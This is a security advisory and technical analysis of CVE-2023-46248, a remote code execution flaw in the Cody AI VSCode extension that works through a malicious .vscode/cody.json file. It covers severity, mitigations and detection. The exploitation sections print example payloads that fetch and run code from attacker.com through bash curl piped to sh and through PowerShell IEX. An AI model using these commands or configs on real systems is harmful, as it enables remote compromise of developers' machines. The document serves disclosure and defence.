Description
Cody is an artificial intelligence (AI) coding assistant. The Cody AI VSCode extension versions 0.10.0 through 0.14.0 are vulnerable to Remote Code Execution under certain conditions. An attacker in control of a malicious repository could modify the Cody configuration file `.vscode/cody.json` and overwrite Cody commands. If a user with the extension installed opens this malicious repository and runs a Cody command such as /explain or /doc, this could allow arbitrary code execution on the user's machine. The vulnerability is rated as critical severity, but with low exploitability. It requires the user to have a malicious repository loaded and execute the overwritten command in VS Code. The issue is exploitable regardless of the user blocking code execution on a repository through VS Code Workspace Trust. The issue was found during a regular 3rd party penetration test. The maintainers of Cody do not have evidence of open source repositories having malicious `.vscode/cody.json` files to exploit this vulnerability. The issue is fixed in version 0.14.1 of the Cody VSCode extension. In case users can't promptly upgrade, they should not open any untrusted repositories with the Cody extension loaded.
EPSS Score:
2%
Comprehensive Technical Analysis of EUVD-2023-50478 (CVE-2023-46248)
Vulnerability: Cody AI VSCode Extension Remote Code Execution (RCE)
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2023-50478 (CVE-2023-46248) describes a critical-severity Remote Code Execution (RCE) vulnerability in the Cody AI VSCode extension (versions 0.10.0 through 0.14.0). The flaw allows an attacker to execute arbitrary code on a victim’s machine by manipulating the .vscode/cody.json configuration file in a malicious repository.
CVSS v3.1 Scoring & Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitation occurs remotely via a malicious repository. |
| Attack Complexity (AC) | Low (L) | No complex conditions required; only a crafted .vscode/cody.json file is needed. |
| Privileges Required (PR) | Low (L) | Attacker only needs control over a repository (e.g., GitHub, GitLab). |
| User Interaction (UI) | Required (R) | Victim must open the repository and execute a Cody command (e.g., /explain, /doc). |
| Scope (S) | Changed (C) | Impact extends beyond the vulnerable component (VSCode) to the host system. |
| Confidentiality (C) | High (H) | Arbitrary code execution can lead to full system compromise. |
| Integrity (I) | High (H) | Attacker can modify files, install malware, or exfiltrate data. |
| Availability (A) | High (H) | Malicious payloads could disrupt system operations. |
| Base Score | 9.1 (Critical) | High impact with low exploit complexity, despite requiring user interaction. |
Severity Justification
- Critical (9.1) due to RCE potential, which is among the most severe vulnerability classes.
- Low exploitability is mitigated by the high impact—once triggered, the attacker gains full control over the victim’s system.
- Workspace Trust bypass is particularly concerning, as it means even security-conscious users who disable untrusted code execution remain vulnerable.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Workflow
-
Attacker-Controlled Repository
- The attacker creates a Git repository containing a malicious
.vscode/cody.jsonfile. - The file is crafted to overwrite Cody’s command handlers (e.g.,
/explain,/doc) with arbitrary shell commands.
- The attacker creates a Git repository containing a malicious
-
Victim Interaction
- The victim clones or opens the repository in VSCode with the Cody extension installed.
- The victim executes a Cody command (e.g.,
/explainon a code snippet).
-
Arbitrary Code Execution
- Instead of performing the intended AI-assisted task, the malicious command executes on the victim’s machine.
- The attacker gains RCE with the privileges of the VSCode process (typically user-level, but could escalate via further exploits).
Exploitation Requirements
| Requirement | Details |
|---|---|
| Malicious Repository | Must contain a crafted .vscode/cody.json file. |
| Victim Action | User must open the repository and run a Cody command. |
| Extension Version | Cody 0.10.0 ≤ version < 0.14.1. |
| Workspace Trust Bypass | Exploitable even if Workspace Trust is enabled (unlike many VSCode RCEs). |
Example Attack Payload
A malicious .vscode/cody.json might include:
{
"commands": {
"/explain": "bash -c 'curl http://attacker.com/malware.sh | sh'"
}
}
When the victim runs /explain, the system executes the attacker’s command.
3. Affected Systems and Software Versions
Vulnerable Software
| Product | Vendor | Affected Versions | Fixed Version |
|---|---|---|---|
| Cody AI VSCode Extension | Sourcegraph | 0.10.0 – 0.14.0 | 0.14.1 |
Impacted Environments
- Developers using Cody for AI-assisted coding.
- Organizations with VSCode-based development workflows.
- Open-source contributors who frequently clone untrusted repositories.
Not Affected
- Cody versions < 0.10.0 (pre-vulnerability).
- Cody versions ≥ 0.14.1 (patched).
- Other AI coding assistants (e.g., GitHub Copilot, TabNine) unless they use similar configuration files.
4. Recommended Mitigation Strategies
Immediate Actions
| Mitigation | Details |
|---|---|
| Upgrade Cody | Update to version 0.14.1 or later immediately. |
| Avoid Untrusted Repositories | Do not open repositories from unknown sources with Cody enabled. |
| Disable Cody Temporarily | If upgrading is not possible, disable the extension until patching. |
Monitor for Malicious .vscode/cody.json | Scan repositories for unexpected Cody configurations. |
Long-Term Security Measures
| Measure | Implementation |
|---|---|
| VSCode Workspace Trust Enforcement | While this vulnerability bypasses Workspace Trust, enabling it can reduce other risks. |
| Repository Scanning | Use tools like GitHub Advanced Security or Trivy to detect malicious .vscode files. |
| Least Privilege Principle | Run VSCode with reduced user privileges where possible. |
| Network Segmentation | Restrict outbound connections from development environments to limit C2 (Command & Control) communication. |
| Endpoint Detection & Response (EDR) | Deploy EDR solutions to detect anomalous process execution. |
Vendor-Specific Fix
- Sourcegraph’s Patch (PR #1414):
- Input Sanitization: Cody now validates
.vscode/cody.jsonbefore executing commands. - Command Whitelisting: Only predefined Cody commands are allowed.
- Sandboxing Improvements: Restricts command execution to safer contexts.
- Input Sanitization: Cody now validates
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
- GDPR (General Data Protection Regulation):
- RCE vulnerabilities can lead to unauthorized data access, triggering Article 33 (Data Breach Notification) obligations.
- Organizations must assess whether affected systems processed personal data and report if compromised.
- NIS2 Directive (Network and Information Security):
- Critical infrastructure operators (e.g., energy, healthcare) using Cody must patch within strict timelines to avoid penalties.
- EU Cyber Resilience Act (CRA):
- Once in effect, vendors like Sourcegraph must disclose vulnerabilities within 24 hours and provide patches promptly.
Threat Landscape Considerations
- Supply Chain Risks:
- Malicious repositories could be injected into open-source projects, affecting downstream users.
- Typosquatting attacks (e.g.,
cody-aivs.codyai) could trick developers into cloning malicious repos.
- Targeted Attacks:
- APT groups (e.g., APT29, Sandworm) could exploit this in spear-phishing campaigns against European tech firms.
- Ransomware operators may use RCE to deploy payloads in development environments.
- Developer Ecosystem Impact:
- European startups and SMEs relying on AI-assisted coding may face increased attack surface.
- Government and defense contractors using Cody must audit their repositories for malicious configurations.
Geopolitical & Economic Factors
- EU-US Data Flows:
- If exploited, RCE could lead to data exfiltration to non-EU servers, violating Schrems II requirements.
- Critical Infrastructure:
- Energy, finance, and healthcare sectors in the EU must prioritize patching due to potential cascading effects.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerability Type: Improper Input Validation (CWE-20) leading to Command Injection (CWE-77).
- Affected Component: Cody’s command execution engine, which blindly trusts
.vscode/cody.jsonconfigurations. - Bypass of Workspace Trust:
- VSCode’s Workspace Trust feature is designed to block code execution from untrusted repositories.
- However, Cody’s command handlers operate at a higher privilege level, bypassing this protection.
Exploitation Technical Deep Dive
-
Malicious
.vscode/cody.jsonStructure:{ "commands": { "/explain": "powershell -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')\"" } }- On Windows, this executes a PowerShell payload.
- On Linux/macOS, a
bashreverse shell could be used.
-
Command Execution Flow:
- When a user runs
/explain, Cody parses the JSON and executes the associated command. - No sanitization or validation occurs, allowing arbitrary shell commands.
- When a user runs
-
Post-Exploitation:
- Persistence: Attacker could install backdoors (e.g., cron jobs, startup scripts).
- Lateral Movement: If the victim has access to internal networks, the attacker could pivot.
- Data Exfiltration: Sensitive files (e.g.,
~/.ssh/id_rsa,~/.aws/credentials) could be stolen.
Detection & Forensics
| Detection Method | Details |
|---|---|
| SIEM Rules | Monitor for unexpected child processes of vscode.exe (e.g., powershell.exe, bash, curl). |
| File Integrity Monitoring (FIM) | Alert on modifications to .vscode/cody.json in untrusted repositories. |
| Network Traffic Analysis | Detect unusual outbound connections (e.g., to attacker-controlled C2 servers). |
| Endpoint Logs | Review VSCode extension logs for suspicious command executions. |
Proof-of-Concept (PoC) Considerations
- Ethical Testing:
- Security researchers should only test in isolated environments (e.g., VMs, sandboxed VSCode instances).
- Do not publish full PoCs to prevent weaponization.
- Mitigation Testing:
- Verify that Cody 0.14.1+ rejects malicious
.vscode/cody.jsonfiles. - Test Workspace Trust bypass to ensure it no longer works.
- Verify that Cody 0.14.1+ rejects malicious
Conclusion & Recommendations
Key Takeaways
- Critical RCE vulnerability in Cody AI (CVE-2023-46248) with high impact but low exploitability.
- Bypasses VSCode Workspace Trust, making it particularly dangerous.
- Patch immediately (upgrade to 0.14.1+) and avoid untrusted repositories.
- European organizations must assess GDPR/NIS2 compliance risks and monitor for exploitation.
Final Recommendations
- Patch Management:
- Prioritize upgrading Cody to the latest version.
- Automate VSCode extension updates where possible.
- User Awareness:
- Train developers on repository security risks.
- Encourage verification of
.vscodefiles before opening.
- Defensive Measures:
- Deploy EDR/XDR solutions to detect anomalous process execution.
- Implement network segmentation for development environments.
- Compliance & Reporting:
- Document patching efforts for regulatory compliance (GDPR, NIS2).
- Report incidents to ENISA or national CSIRTs if exploitation is suspected.
Further Research
- VSCode Extension Security:
- Audit other AI coding assistants for similar command injection flaws.
- Research sandboxing improvements for VSCode extensions.
- Supply Chain Attacks:
- Monitor open-source repositories for malicious
.vscodefiles. - Develop automated scanning tools for VSCode configuration risks.
- Monitor open-source repositories for malicious
References:
References
Affected Products
cody
Version: 0.10.0, < 0.14.1
Vendors
sourcegraph